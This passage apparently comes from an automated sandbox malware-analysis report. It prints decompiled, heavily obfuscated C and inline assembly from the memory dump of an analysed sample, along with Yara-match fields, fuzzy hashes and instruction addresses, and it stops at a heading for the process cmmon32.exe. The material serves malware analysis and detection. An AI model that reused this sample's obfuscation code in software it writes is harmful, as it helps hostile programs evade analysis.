							asm("adc esp, [0xfd9c7577]");
							_push( *0x26daa109);
							if(_t181 >= 0) {
								_t86 =  *0x7252dc7c * 0x4e84;
								if(_t86 == 0) {
									 *0xbe597375 = _t86;
									asm("lodsd");
									 *0xb34e9004 =  *0xb34e9004 << 0x37;
									_pop(_t88);
									 *0x86f2bb0a =  *0x86f2bb0a >> 0x95;
									 *0x5b854ad3 =  *0x5b854ad3 | _t47;
									_t151 = _t149 + 0x176c8cfe |  *0x6d7c473d;
									asm("ror byte [0x1712b5e4], 0x23");
									asm("sbb ah, 0x86");
									_t48 = _t47 |  *0x2c7e2e16;
									_pop(_t124);
									_t89 =  *0x6d7536c9;
									 *0x6d7536c9 = _t88;
									_t106 =  *0x16e93069 * 0x7daf;
									_t125 = _t124 |  *0x3d23f50b;
									_t164 = _t163 |  *0x191be4f4;
									_t70 = _t69 -  *0xed22ebe0;
									asm("sbb ebp, 0x9c58a56d");
									if(_t70 < 0) {
										asm("adc esi, [0xec973479]");
										 *0xb0ae5d39 =  *0xb0ae5d39 - _t164;
										 *0x20edfae3 =  *0x20edfae3 + _t70;
										asm("sbb [0x9bb3b1b7], cl");
										 *0x50983c9 =  *0x50983c9 >> 0x82;
										asm("cmpsb");
										 *0x480b8167 =  *0x480b8167 | _t89 ^ 0x00000000;
										 *0xb336e120 =  *0xb336e120 | _t48;
										asm("adc esi, [0xabc3d18f]");
										asm("adc esp, [0x290bfdd5]");
										 *0xa6eb8bde =  *0xa6eb8bde << 0xde;
										asm("rcr dword [0x230efdd5], 0xdd");
										 *0x16a30e31 =  *0x16a30e31 ^ (_t151 | 0x1c1afb96);
										_t126 = _t125 + 1;
										 *0xb6243188 =  *0xb6243188 >> 0x6c;
										asm("rcl byte [0x33aef908], 0x68");
										 *0x5f8b9937 =  *0x5f8b9937 ^ _t106;
										asm("sbb dl, 0x34");
										 *0x2c5e4014 =  *0x2c5e4014 << 0x3f;
										asm("adc dh, 0x12");
										_t71 = _t70 &  *0x8c59df12;
										 *0xdd22dc86 =  *0xdd22dc86 ^ _t71;
										_t92 =  *0x2b2c9acf;
										asm("rol byte [0xbda624f2], 0xd6");
										asm("rcr dword [0xa3ea121d], 0x97");
										_t108 = _t106 - 0x00000001 ^ 0x9ea3db3d;
										_t50 = (_t48 ^ 0x0000000a) +  *0xd1d4bca;
										asm("sbb eax, [0x73e36f0d]");
										asm("adc esi, 0xa4a34cc0");
										if(_t50 < 0) {
											asm("adc edi, [0x4a861273]");
											_t72 = _t71 ^ 0xa3b931cb;
											 *0x64814b10 =  *0x64814b10 - _t108;
											 *0x7f3777a0 = _t50;
											_pop(_t166);
											asm("rcr byte [0xddb5091a], 0xf7");
											 *0x32130a81 =  *0x32130a81 ^ _t72;
											_push(_t108);
											 *0xd58dad29 =  *0xd58dad29 << 0x12;
											_t93 = _t92 | 0x000000c9;
											 *0x8b17fbd3 =  *0x8b17fbd3 ^ _t166;
											_t135 = 0x3ca9198c +  *0x78c8c6b * 0x6a2d;
											if((_t108 |  *0xcc18940d) == 0) {
												_t94 = _t93 + 1;
												 *0xbeb4ecd9 =  *0xbeb4ecd9 | _t94;
												 *0xbadafdf1 =  *0xbadafdf1 - 0x1fa92a7b;
												asm("stosd");
												asm("adc eax, [0x6dfe923d]");
												_t95 = _t94 ^ 0x00000022;
												asm("sbb ebx, [0x6b290011]");
												_t73 = _t72 +  *0x12839d1b;
												asm("stosd");
												_push(_t166);
												 *0x87312133 =  *0x87312133 + _t95;
												asm("adc [0x2b898fd5], esp");
												_push(_t73);
												 *0xb5bbdf0 =  *0xb5bbdf0 << 0xab;
												asm("sbb [0x5d343a3a], cl");
												 *0xcbecf632 =  *0xcbecf632 >> 0x65;
												 *0x2200f0c2 = 0x1fa92a7b;
												asm("rol byte [0x807a8838], 0x94");
												 *0x4b465516 =  *0x4b465516 << 0x4f;
												E0041B496();
												 *0x72eba03a =  *0xa7973af6;
												asm("sbb [0x336c880], bl");
												 *0xfd16fad2 =  *0xfd16fad2 +  *0x72eba03a;
												asm("sbb ebp, [0x654c663d]");
												 *0xbf02c004 =  *0xbf02c004 >> 0x47;
												asm("adc bh, [0xef8be9e3]");
												 *0x7192db2c =  *0x7192db2c << 0x48;
												_t156 = _t73;
												_t74 = _t73 ^  *0x7c1bd46c;
												_t168 = _t166 -  *0x6da73287 -  *0x64cda393;
												asm("adc ch, 0xe4");
												asm("sbb ecx, [0x11a8c467]");
												asm("adc [0xb11a7100], cl");
												 *0xe7269de1 =  *0xe7269de1 ^ _t74;
												_t138 =  *0x79da4885;
												 *0x79da4885 = _t135 +  *0xa03fbd2f &  *0x523d0003;
												asm("rol dword [0x80276d9], 0xda");
												asm("rcr byte [0xeca4ffe0], 0x14");
												_push(_t156);
												 *0x437ef68c =  *0x437ef68c << 0x98;
												_push(_t126);
												 *0x9817efb =  *0x9817efb >> 0x55;
												 *0x224475f8 =  *0xbe3eb26b * 0xc0d6;
												_push(_t156 - 0xafb167eb);
												_t76 = _t74 - 0xf9 -  *0x996081d2;
												asm("adc edi, [0x99053409]");
												 *0x19eed505 =  *0x19eed505 | 0x1fa92a7b;
												 *0xd505dfe7 = _t95 +  *0x6e788fec +  *0xe2732ccf - 1;
												 *0x77c5b905 =  *0x77c5b905 << 0x2d;
												_t57 =  *0x224475f8 |  *0xad05dfe0;
												 *0xdfde73ba =  *0xdfde73ba << 6;
												 *0xac03dfee =  *0xac03dfee ^ _t57;
												if( *0x9a044024 > _t76) {
													asm("sbb esi, 0x444b1bb");
													 *0x44abc90c =  *0x44abc90c << 0x6f;
													 *0xe605dffa =  *0xe605dffa | _t168 + 0x00000001;
													asm("adc bl, 0x32");
													asm("adc ecx, [0x42e007df]");
													asm("sbb ebx, [0x5e711207]");
													 *0x1a45376f = 0x1fa92a7b;
													 *0x15d92807 =  *0x15d92807 & 0x1fa92a7b;
													 *0x81a5308 = _t57 +  *0xa9c87704 - 1 +  *0x1a47426c;
													_push(0xc);
													_push(_t138 +  *0xf232082f);
													 *0xdb5e9cde =  *0xdb5e9cde +  *0x81a5308;
													asm("sbb ebp, [0x4854868]");
													asm("adc ah, [0x7017161a]");
													asm("sbb [0xd40e0804], dh");
													if((_t76 ^  *0x414b008) < 0) {
														asm("sbb eax, [0x51090479]");
														 *0xc12f572a =  *0xc12f572a >> 0xdf;
														asm("lodsd");
														asm("rol byte [0x816a24e5], 0x26");
														asm("adc bh, 0xca");
														asm("adc dl, 0xf2");
														asm("sbb ebx, [0xfbdaf411]");
														 *0x458fc10b =  *0x3aca5609;
														asm("lodsd");
														 *0x9569553b =  *0x9569553b ^ _t126;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				goto L0;
			}













































                                                        0x0041b496
                                                        0x0041b496
                                                        0x0041b4af
                                                        0x0041b4b0
                                                        0x0041b4bc
                                                        0x0041b4d1
                                                        0x0041b4d8
                                                        0x0041b4e8
                                                        0x0041b4ee
                                                        0x0041b4ef
                                                        0x0041b4f1
                                                        0x0041b4f7
                                                        0x0041b50b
                                                        0x0041b518
                                                        0x0041b52a
                                                        0x0041b531
                                                        0x0041b53d
                                                        0x0041b543
                                                        0x0041b54a
                                                        0x0041b550
                                                        0x0041b556
                                                        0x0041b562
                                                        0x0041b56f
                                                        0x0041b575
                                                        0x0041b581
                                                        0x0041b587
                                                        0x0041b58e
                                                        0x0041b5af
                                                        0x0041b5b6
                                                        0x0041b5c0
                                                        0x0041b5c7
                                                        0x0041b5cd
                                                        0x0041b5d4
                                                        0x0041b5d4
                                                        0x0041b5da
                                                        0x0041b5e0
                                                        0x0041b5e6
                                                        0x0041b5ec
                                                        0x0041b5f2
                                                        0x0041b5f5
                                                        0x0041b5fb
                                                        0x0041b604
                                                        0x0041b610
                                                        0x0041b610
                                                        0x0041b616
                                                        0x0041b61c
                                                        0x0041b622
                                                        0x0041b628
                                                        0x0041b62e
                                                        0x0041b638
                                                        0x0041b63e
                                                        0x0041b651
                                                        0x0041b658
                                                        0x0041b665
                                                        0x0041b666
                                                        0x0041b66d
                                                        0x0041b673
                                                        0x0041b679
                                                        0x0041b690
                                                        0x0041b693
                                                        0x0041b699
                                                        0x0041b6a4
                                                        0x0041b6a4
                                                        0x0041b6aa
                                                        0x0041b6b4
                                                        0x0041b6ba
                                                        0x0041b6c0
                                                        0x0041b6c6
                                                        0x0041b6cc
                                                        0x0041b6d2
                                                        0x0041b6d8
                                                        0x0041b6de
                                                        0x0041b6e4
                                                        0x0041b6ea
                                                        0x0041b6f7
                                                        0x0041b6fb
                                                        0x0041b701
                                                        0x0041b707
                                                        0x0041b70d
                                                        0x0041b713
                                                        0x0041b720
                                                        0x0041b72a
                                                        0x0041b730
                                                        0x0041b731
                                                        0x0041b73e
                                                        0x0041b745
                                                        0x0041b74b
                                                        0x0041b74e
                                                        0x0041b755
                                                        0x0041b758
                                                        0x0041b75e
                                                        0x0041b764
                                                        0x0041b76a
                                                        0x0041b772
                                                        0x0041b780
                                                        0x0041b78c
                                                        0x0041b792
                                                        0x0041b798
                                                        0x0041b79e
                                                        0x0041b7a4
                                                        0x0041b7b0
                                                        0x0041b7b6
                                                        0x0041b7c8
                                                        0x0041b7ce
                                                        0x0041b7cf
                                                        0x0041b7e0
                                                        0x0041b7e6
                                                        0x0041b7e7
                                                        0x0041b7ee
                                                        0x0041b7f1
                                                        0x0041b7f7
                                                        0x0041b803
                                                        0x0041b80e
                                                        0x0041b821
                                                        0x0041b827
                                                        0x0041b82d
                                                        0x0041b834
                                                        0x0041b83a
                                                        0x0041b83d
                                                        0x0041b843
                                                        0x0041b849
                                                        0x0041b84a
                                                        0x0041b84b
                                                        0x0041b851
                                                        0x0041b857
                                                        0x0041b858
                                                        0x0041b865
                                                        0x0041b86b
                                                        0x0041b878
                                                        0x0041b87e
                                                        0x0041b88b
                                                        0x0041b899
                                                        0x0041b8a4
                                                        0x0041b8ab
                                                        0x0041b8b1
                                                        0x0041b8b7
                                                        0x0041b8cf
                                                        0x0041b8d6
                                                        0x0041b8dc
                                                        0x0041b8e3
                                                        0x0041b8e4
                                                        0x0041b8f3
                                                        0x0041b8f9
                                                        0x0041b8fc
                                                        0x0041b908
                                                        0x0041b90e
                                                        0x0041b914
                                                        0x0041b914
                                                        0x0041b92a
                                                        0x0041b93a
                                                        0x0041b947
                                                        0x0041b94e
                                                        0x0041b955
                                                        0x0041b956
                                                        0x0041b95d
                                                        0x0041b97e
                                                        0x0041b97f
                                                        0x0041b985
                                                        0x0041b991
                                                        0x0041b997
                                                        0x0041b9a3
                                                        0x0041b9aa
                                                        0x0041b9b0
                                                        0x0041b9bd
                                                        0x0041b9c9
                                                        0x0041b9d6
                                                        0x0041b9dc
                                                        0x0041b9f0
                                                        0x0041b9f6
                                                        0x0041ba05
                                                        0x0041ba12
                                                        0x0041ba18
                                                        0x0041ba2a
                                                        0x0041ba33
                                                        0x0041ba3c
                                                        0x0041ba3d
                                                        0x0041ba47
                                                        0x0041ba4d
                                                        0x0041ba59
                                                        0x0041ba5f
                                                        0x0041ba6b
                                                        0x0041ba71
                                                        0x0041ba77
                                                        0x0041ba7e
                                                        0x0041ba8c
                                                        0x0041baa4
                                                        0x0041baa7
                                                        0x0041bab0
                                                        0x0041bab6
                                                        0x0041babc
                                                        0x0041babd
                                                        0x0041babd
                                                        0x0041ba6b
                                                        0x0041b9c9
                                                        0x0041b803
                                                        0x0041b79e
                                                        0x0041b6cc
                                                        0x0041b638
                                                        0x0041b628
                                                        0x0041b616
                                                        0x0041b5f5
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 62c2fa657d2ade640da85d2be9398006a075149d06f0c35e3b9495e205e1609c
                                                        • Instruction ID: 11fbac670062aada05926560e070812aaeb18bf592e98f3505081806828cd776
                                                        • Opcode Fuzzy Hash: 62c2fa657d2ade640da85d2be9398006a075149d06f0c35e3b9495e205e1609c
                                                        • Instruction Fuzzy Hash: 81A19732848385CFE706DF39D99A7423FB6F306320F08469EC9A157592E3792619DF85
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041C8A4, Relevance: .2, Instructions: 169COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 51%
                                                        			E0041C8A4(signed char __eax, signed int __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				signed char _t24;
				signed char _t25;
				void* _t27;
				char _t34;
				signed int _t36;
				signed int _t40;
				signed int _t52;
				signed int _t66;
				signed int _t67;
				void* _t69;
				signed int _t70;
				signed int _t74;

				_t36 = __ebx;
				_t24 = __eax;
				_t52 = __edx - 0xe0;
				 *0x6216efa8 =  *0x6216efa8 << 0xff;
				asm("sbb ch, [0xd8a8c4a8]");
				_t70 = _t69 + 1;
				_t66 =  *0xd6b616ef;
				if(_t70 < 0) {
					goto L1;
					do {
						do {
							do {
								do {
									do {
										L1:
										_t24 = _t24 &  *0x939ff7b7;
										asm("adc [0x8f83e7b0], ch");
									} while (_t24 == 0);
									_t70 = _t70 -  *0xc419e217;
									_t74 = _t74 +  *0x84e5c4bb;
								} while (_t74 != 0);
								_t74 = _t74 - 0xdd634e75;
							} while ( *0xaeb00218 >= _t52);
							_push( *0xe77cd173);
							asm("lodsb");
							_t52 = _t52 | 0x0000001c;
							 *0x32c1ddbd =  *0x32c1ddbd >> 0x7f;
							_t36 = _t36 +  *0xefa8e0cc;
							asm("adc ecx, 0x85c02c16");
							 *0xc6a616ef =  *0xc6a616ef & _t74;
							_t70 = _t70 + 1;
							_t66 = _t66 |  *0xc1daa919;
							asm("rcl byte [0xa8e0cc32], 0xb1");
						} while (( *0xc83916ef & _t52) != 0);
						_t67 = _t66 &  *0x45d8a8c4;
						asm("sbb [0x8b7a16ef], ecx");
						asm("rcr byte [0x3816efa8], 0x59");
						_push(_t52);
						_t25 = _t24 + 1;
						_push(_t25);
						 *0xef45d88d =  *0xef45d88d << 0xa4;
						asm("adc [0x81c42916], esp");
						 *0x4052173a =  *0x4052173a | _t25;
						 *0x9cba1d16 =  *0x9cba1d16 >> 0x50;
						_t27 = _t25;
						_push(0xef45d88d);
						 *0x453d99a1 =  *0x453d99a1 ^ _t67;
						 *0x2b16efa8 =  *0x2b16efa8 << 0xc9;
						asm("sbb eax, [0xbe0b1c6d]");
						asm("sbb ch, [0x16efa8e0]");
						asm("adc [0x17ff2f8a], ah");
						 *0xefa8e0cc =  *0xefa8e0cc | _t27 +  *0xaddd0fb4 +  *0xe0cc3283 ^ 0xcc32c1ef;
						 *0x7093ff16 =  *0x7093ff16 >> 0x5a;
						 *0xa8e0cc32 =  *0xa8e0cc32 << 0x2d;
						asm("sbb esi, 0xd9b004fa");
						 *0xc62116ef =  *0xc62116ef >> 0x6a;
						 *0x395fc0d6 =  *0x395fc0d6 << 0xf0;
						asm("stosb");
						 *0x5f828ee2 =  *0x5f828ee2 << 0xf6;
						 *0x32ccebb8 =  *0x32ccebb8 << 0x80;
						 *0xaece9d8d =  *0x140b36b6;
						_t74 = (_t74 &  *0x81d04116) - 0xef45d88d &  *0xd79c0126;
						_t34 =  *0xba16efa8;
						 *0xba16efa8 =  *0xc5f7c62b + 0x000000d2 &  *0x9e8e16ef;
						asm("rol byte [0xaf869af2], 0x9c");
						asm("sbb [0x5fc3ccf9], al");
						asm("sbb ecx, [0x16d24939]");
						 *0xab9c4208 = _t34;
						asm("rol dword [0x32baf2c1], 0xfd");
						asm("adc ebx, [0xefa8e0cc]");
						asm("rol dword [0x983e0416], 0xd");
						asm("cmpsw");
						_t40 = ((_t36 ^  *0x997775) +  *0x32ee16ef |  *0xa8e0cc32) ^  *0x71c621c;
						asm("movsb");
						 *0xcc32c1db =  *0xcc32c1db << 0x84;
						asm("rol byte [0x16efa8e0], 0xd4");
						asm("sbb esp, 0x7c73a2fe");
						asm("rol byte [0xef45d8a8], 0x7f");
						_push( *0xa0f4be16);
						_t52 = ((_t52 | 0xe0cc32b9) +  *0x8ce2a816 ^  *0xe0cc32c1) -  *0x49395fa8;
						_t66 = _t67 -  *0xc4a8009a &  *0xe0cc32c1;
						asm("rcl byte [0xc16efa8], 0x1b");
						 *0xecc9b4a0 =  *0xecc9b4a0 & _t40;
						asm("sbb ecx, [0x395fc2cc]");
						 *0xc48616d2 =  *0xc48616d2 >> 0xc4;
						_pop( *0xddbd3ccd);
						 *0xe0cc32c1 = 0x87dbae16;
						asm("rcr byte [0x16efa8], 0x21");
						_t24 = _t34 +  *0x947a16d2 ^  *0x395faf88;
						asm("rcl byte [0x241016d2], 0xed");
						 *0xfb45494 =  *0xfb45494 >> 0x88;
						_t36 = _t40 & 0xd88daddd;
						_t70 = (_t70 &  *0x34f216ef) +  *0x99d1b49b + 1;
						 *0xe04c16ef =  *0xe04c16ef - _t24;
					} while ( *0xe04c16ef > 0);
					asm("adc [0x45d8a8c4], eax");
					asm("sbb ecx, 0xf9e2bc0");
					asm("rcl dword [0x40ecb2a1], 0xb2");
					 *0x8f16ef88 =  *0x8f16ef88 << 0x3c;
					asm("sbb edx, [0x826380d6]");
					asm("adc cl, 0x0");
					asm("rol byte [0xd8a8c4a8], 0x20");
					asm("sbb esp, [0xf9e2bbc]");
					 *0x40ecb2a1 = _t52;
					 *0x4b16ef88 =  *0x4b16ef88 >> 0x8a;
					asm("ror byte [0xcc319fe2], 0x86");
					 *0x16d24939 = 0x121f16ef;
					 *0x2e339416 =  *0x2e339416 >> 0xdc;
					return _t24;
				} else {
					__ebp = __ebp &  *0x52173a78;
					__eax = __eax + 1;
					_push(__eax);
					__esp = __esp +  *0xef45d88d;
					__al = __al | 0x00000016;
					return __eax;
				}
			}















                                                        0x0041c8a4
                                                        0x0041c8a4
                                                        0x0041c8aa
                                                        0x0041c8ad
                                                        0x0041c8bd
                                                        0x0041c8c3
                                                        0x0041c8c4
                                                        0x0041c8ca
                                                        0x00000000
                                                        0x0041c57b
                                                        0x0041c57b
                                                        0x0041c57b
                                                        0x0041c57b
                                                        0x0041c57b
                                                        0x0041c57b
                                                        0x0041c57b
                                                        0x0041c581
                                                        0x0041c581
                                                        0x0041c58f
                                                        0x0041c595
                                                        0x0041c595
                                                        0x0041c59e
                                                        0x0041c5a4
                                                        0x0041c5ac
                                                        0x0041c5b2
                                                        0x0041c5bf
                                                        0x0041c5c2
                                                        0x0041c5c9
                                                        0x0041c5cf
                                                        0x0041c5e1
                                                        0x0041c5e7
                                                        0x0041c5e8
                                                        0x0041c5ee
                                                        0x0041c5f5
                                                        0x0041c60a
                                                        0x0041c610
                                                        0x0041c622
                                                        0x0041c62f
                                                        0x0041c630
                                                        0x0041c631
                                                        0x0041c632
                                                        0x0041c64d
                                                        0x0041c653
                                                        0x0041c660
                                                        0x0041c667
                                                        0x0041c66e
                                                        0x0041c67e
                                                        0x0041c696
                                                        0x0041c69d
                                                        0x0041c6a8
                                                        0x0041c6ae
                                                        0x0041c6ba
                                                        0x0041c6c0
                                                        0x0041c6cc
                                                        0x0041c6d9
                                                        0x0041c6e8
                                                        0x0041c6f5
                                                        0x0041c707
                                                        0x0041c708
                                                        0x0041c71a
                                                        0x0041c72d
                                                        0x0041c73f
                                                        0x0041c74b
                                                        0x0041c74b
                                                        0x0041c751
                                                        0x0041c758
                                                        0x0041c75e
                                                        0x0041c764
                                                        0x0041c769
                                                        0x0041c770
                                                        0x0041c776
                                                        0x0041c77d
                                                        0x0041c78c
                                                        0x0041c792
                                                        0x0041c793
                                                        0x0041c79a
                                                        0x0041c7a1
                                                        0x0041c7ad
                                                        0x0041c7b4
                                                        0x0041c7c0
                                                        0x0041c7d2
                                                        0x0041c7d8
                                                        0x0041c7e0
                                                        0x0041c7e6
                                                        0x0041c7ed
                                                        0x0041c7f4
                                                        0x0041c7fa
                                                        0x0041c800
                                                        0x0041c810
                                                        0x0041c817
                                                        0x0041c81e
                                                        0x0041c825
                                                        0x0041c82b
                                                        0x0041c82c
                                                        0x0041c82c
                                                        0x0041c83f
                                                        0x0041c84b
                                                        0x0041c851
                                                        0x0041c858
                                                        0x0041c85f
                                                        0x0041c865
                                                        0x0041c868
                                                        0x0041c876
                                                        0x0041c87c
                                                        0x0041c882
                                                        0x0041c889
                                                        0x0041c896
                                                        0x0041c89c
                                                        0x0041c8a3
                                                        0x0041c8d0
                                                        0x0041c8d0
                                                        0x0041c8d6
                                                        0x0041c8d7
                                                        0x0041c8d8
                                                        0x0041c8de
                                                        0x0041c8e0
                                                        0x0041c8e0

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 440dac62f3aa7be85153e5c3cbb9c47c302cd3ddfd173172cf3964a2edc44714
                                                        • Instruction ID: 0b9ad09689685e5dd36f319cfa2f8c0f6616285d7f7a45d552eac92289525316
                                                        • Opcode Fuzzy Hash: 440dac62f3aa7be85153e5c3cbb9c47c302cd3ddfd173172cf3964a2edc44714
                                                        • Instruction Fuzzy Hash: 8F8101328883D1DFE705DF38E8AAA823F71E757334B480789C9A1575D2D77420AACB85
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401030, Relevance: .1, Instructions: 108COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00401030(signed char* __eax) {
				signed char* _t37;
				unsigned int _t43;
				unsigned int _t65;
				signed int _t67;
				unsigned int _t73;
				unsigned int _t81;
				unsigned int _t88;
				signed char _t94;
				signed char _t97;
				signed char _t100;

				_t37 = __eax;
				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
				_t94 = __eax[0xb];
				if((_t94 & 0x00000001) != 0) {
					_t65 = _t65 | 0x80000000;
				}
				_t37[0xc] = _t65 >> 0x18;
				_t37[0xf] = _t65;
				_t37[0xd] = _t65 >> 0x10;
				_t43 = _t65;
				_t67 = (_t37[8] & 0x000000ff) << 8;
				_t73 = (((_t67 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
				_t97 = _t37[7];
				_t37[0xe] = _t43 >> 8;
				if((_t97 & 0x00000001) != 0) {
					_t73 = _t73 | 0x80000000;
				}
				_t37[8] = _t73 >> 0x18;
				_t37[0xb] = _t73;
				_t37[9] = _t73 >> 0x10;
				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
				_t100 = _t37[3];
				_t37[0xa] = _t73 >> 8;
				if((_t100 & 0x00000001) != 0) {
					_t81 = _t81 | 0x80000000;
				}
				_t37[4] = _t81 >> 0x18;
				_t37[7] = _t81;
				_t37[5] = _t81 >> 0x10;
				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
				 *_t37 = _t88 >> 0x18;
				_t37[1] = _t88 >> 0x10;
				_t37[6] = _t81 >> 8;
				_t37[2] = _t88 >> 8;
				_t37[3] = _t88;
				return _t37;
			}













                                                        0x00401030
                                                        0x0040105b
                                                        0x0040105d
                                                        0x00401063
                                                        0x00401065
                                                        0x00401065
                                                        0x00401071
                                                        0x00401076
                                                        0x0040107c
                                                        0x0040107f
                                                        0x00401085
                                                        0x004010ac
                                                        0x004010ae
                                                        0x004010b4
                                                        0x004010ba
                                                        0x004010bc
                                                        0x004010bc
                                                        0x004010cb
                                                        0x004010d0
                                                        0x004010d6
                                                        0x00401101
                                                        0x00401103
                                                        0x00401109
                                                        0x0040110f
                                                        0x00401111
                                                        0x00401111
                                                        0x00401120
                                                        0x00401128
                                                        0x0040112b
                                                        0x0040114f
                                                        0x00401156
                                                        0x0040115d
                                                        0x00401169
                                                        0x0040116c
                                                        0x0040116f
                                                        0x00401173

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                        • Instruction ID: 9ce4faf4bd6c29c48d5e9242fd1ccb7de96948774e055271f7c113e60250bd75
                                                        • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                        • Instruction Fuzzy Hash: 203180116596F10ED30E836D08BDA75AEC18E9720174EC2FEDADA6F2F3C0888408D3A5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401026, Relevance: .1, Instructions: 81COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00401026(signed char* __eax, unsigned int __ebx, signed int __ecx, signed int __edx) {
				signed char* _t26;
				unsigned int _t48;
				unsigned int _t56;
				unsigned int _t63;
				signed char _t67;
				signed char _t70;

				_t26 = __eax;
				_t48 = (((__ecx | __eax[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xa] & 0xff) << 0x00000007 | (__edx & 0x000000ff) >> 0x00000001;
				_t67 = __eax[7];
				__eax[0xe] = __ebx >> 8;
				if((_t67 & 0x00000001) != 0) {
					_t48 = _t48 | 0x80000000;
				}
				_t26[8] = _t48 >> 0x18;
				_t26[0xb] = _t48;
				_t26[9] = _t48 >> 0x10;
				_t56 = ((((_t26[4] & 0x000000ff) << 0x00000008 | _t26[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t26[6] & 0xff) << 0x00000007 | (_t67 & 0x000000ff) >> 0x00000001;
				_t70 = _t26[3];
				_t26[0xa] = _t48 >> 8;
				if((_t70 & 0x00000001) != 0) {
					_t56 = _t56 | 0x80000000;
				}
				_t26[4] = _t56 >> 0x18;
				_t26[7] = _t56;
				_t26[5] = _t56 >> 0x10;
				_t63 = (((_t26[1] & 0x000000ff) << 0x00000008 | _t26[2] & 0x000000ff) & 0x00ffffff | ( *_t26 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t70 & 0x000000ff) >> 0x00000001;
				 *_t26 = _t63 >> 0x18;
				_t26[1] = _t63 >> 0x10;
				_t26[6] = _t56 >> 8;
				_t26[2] = _t63 >> 8;
				_t26[3] = _t63;
				return _t26;
			}









                                                        0x00401026
                                                        0x004010ac
                                                        0x004010ae
                                                        0x004010b4
                                                        0x004010ba
                                                        0x004010bc
                                                        0x004010bc
                                                        0x004010cb
                                                        0x004010d0
                                                        0x004010d6
                                                        0x00401101
                                                        0x00401103
                                                        0x00401109
                                                        0x0040110f
                                                        0x00401111
                                                        0x00401111
                                                        0x00401120
                                                        0x00401128
                                                        0x0040112b
                                                        0x0040114f
                                                        0x00401156
                                                        0x0040115d
                                                        0x00401169
                                                        0x0040116c
                                                        0x0040116f
                                                        0x00401173

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b5c008fba00b92140c89e666bacc6c4a5d4c27d6abcc9256fe0a3b0b99961e31
                                                        • Instruction ID: 6aafdd9f8f680a5c33d3b48a04eb534702ed37652dc5c9fafc312b7a7807a5db
                                                        • Opcode Fuzzy Hash: b5c008fba00b92140c89e666bacc6c4a5d4c27d6abcc9256fe0a3b0b99961e31
                                                        • Instruction Fuzzy Hash: 132171116597F14ED30E836D08B9575AEC18E5620174EC2EEDADA6F2E3C4888409D3A5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00406A9F, Relevance: .0, Instructions: 13COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 37%
                                                        			E00406A9F(void* __eax) {

				asm("lock push 0x66");
				return 1;
			}



                                                        0x00406aa1
                                                        0x00406ab4

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 11e06e4fd1f928528fc2a9187c9d8246e85bf2bf022a431c7e2c93cdfc5af0ee
                                                        • Instruction ID: ad954cfd6c418f29b8ca6e7d93b53f469ed242a352cefdff081fcce4dea49022
                                                        • Opcode Fuzzy Hash: 11e06e4fd1f928528fc2a9187c9d8246e85bf2bf022a431c7e2c93cdfc5af0ee
                                                        • Instruction Fuzzy Hash: 11B09222A9A00801E120080C78427F0E368D343624E102293E808B758000C7C4620089
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Analysis Process: cmmon32.exe PID: 6056 Parent PID: 3292 cmmon32.exeCOMMON

                                                        Executed Functions

                                                        Function 030581B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                        Download Yara Rule
                                                        APIs
